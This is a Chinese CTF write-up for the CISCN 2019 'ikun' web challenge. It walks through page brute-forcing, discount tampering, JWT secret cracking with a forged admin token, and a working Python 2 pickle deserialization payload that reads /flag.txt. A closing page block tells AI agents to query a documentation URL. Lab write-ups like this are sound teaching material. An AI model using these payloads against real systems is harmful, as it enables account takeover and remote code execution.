# \[华北赛区]ikun

爆lv6

```
import requests

for i in range(512):
    url = f"http://78cd9dcd-96d8-4fb8-9785-be448ad9dc9e.node3.buuoj.cn/shop?page={i}"
    response = requests.get(url=url)
    if response.text.find("lv6.png") != -1:
        print(i)
        break
```

在181页，抓包修改折扣倍率，跳转到b1g\_m4mber，提示需要admin才能访问，抓包发现是JWT认证。

使用c-jwt-cracker爆破

```
$ docker build . -t jwtcrack
$ docker run -it --rm  jwtcrack eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6Imd1ZXN0In0.dDz06h0lkd5_0DT8vUVcGLBGvX2btxx2AyJJCQWkEoQ
```

```
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIn0.40on__HQ8B2-wM1ZSwax3ivRK4j54jlaXv-1JjQynjo
```

<figure><img src="/files/seviTFQl3Hx3dtYlBlVL" alt=""><figcaption></figcaption></figure>

有源码泄露，在Admin.py中找到反序列化点。

```
import tornado.web
from sshop.base import BaseHandler
import pickle
import urllib


class AdminHandler(BaseHandler):
    @tornado.web.authenticated
    def get(self, *args, **kwargs):
        if self.current_user == "admin":
            return self.render('form.html', res='This is Black Technology!', member=0)
        else:
            return self.render('no_ass.html')

    @tornado.web.authenticated
    def post(self, *args, **kwargs):
        try:
            become = self.get_argument('become')
            p = pickle.loads(urllib.unquote(become))
            return self.render('form.html', res=p, member=1)
        except:
            return self.render('form.html', res='This is Black Technology!', member=0)
```

\_\_reduce\_\_方法在反序列化时被调用，类似PHP的wakeup，参考王叹之的脚本。

```
import pickle
import urllib

class payload(object):
    def __reduce__(self):
       return (eval, ("open('/flag.txt','r').read()",))

a = pickle.dumps(payload())
a = urllib.quote(a)
print a
```

比较重要的是这题的环境是python2的，python2和python3的反序列化是不一样的，当时卡了比较久。


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://gitbook-88.gitbook.io/ctf-writeup/2019/2019-ciscn/hua-bei-sai-qu-ikun.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.